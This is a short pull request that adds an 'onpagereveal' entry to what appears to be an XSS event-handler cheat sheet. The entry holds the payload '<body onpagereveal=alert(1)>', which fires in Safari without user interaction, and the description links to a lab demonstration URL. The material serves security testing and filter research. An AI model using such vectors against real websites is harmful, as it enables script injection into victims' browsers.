### PR TITLE
Add onpagereveal event - no user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6408,5 +6408,16 @@
         "interaction": true
       }
     ]
+  },
+  "onpagereveal": {
+    "description": "Fires when the page is shown",
+    "tags": [
+      {
+        "tag": "body",
+        "code": "<body onpagereveal=alert(1)>",
+        "browsers": ["safari"],
+        "interaction": false
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, use https://portswigger-labs.net/xss/xss.php?context=html&x=%3cbody%20onpagereveal=alert(1)%3e